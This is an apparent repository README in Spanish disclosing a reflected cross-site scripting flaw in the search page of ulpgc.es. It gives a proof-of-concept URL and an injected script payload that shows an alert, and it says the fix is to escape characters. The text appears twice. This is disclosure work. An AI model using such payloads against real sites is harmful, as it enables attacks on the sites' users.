MiguelBel/ULPGC.es

## ULPGC.es
Hola, he encontrado una vulnerabilidad en su web que permite ejecutar código javascript. Solucionarlo es fácil ya que simplemente tienen que escapar correctamente los caracteres.

La prueba de concepto es:

URL => http://ulpgc.es/index.php?pagina=busqueda&ver=google&cx=015287457728437169121%3Awsqhyz0xz24&cof=FORID%3A10%3BNB%3A1&ie=ISO-8859-1&q=holahola%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cclass%3D%22no&sa=Buscar

Poner holahola"><script>alert(String.fromCharCode(88,83,83));</script><class="no en el formulario de la parte superior.

Un saludo.
	Hola, he encontrado una vulnerabilidad en su web que permite ejecutar código javascript. Solucionarlo es fácil ya que simplemente tienen que escapar correctamente los caracteres.

	La prueba de concepto es:

	URL => http://ulpgc.es/index.php?pagina=busqueda&ver=google&cx=015287457728437169121%3Awsqhyz0xz24&cof=FORID%3A10%3BNB%3A1&ie=ISO-8859-1&q=holahola%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E%3Cclass%3D%22no&sa=Buscar

	Poner holahola"><script>alert(String.fromCharCode(88,83,83));</script><class="no en el formulario de la parte superior.

	Un saludo.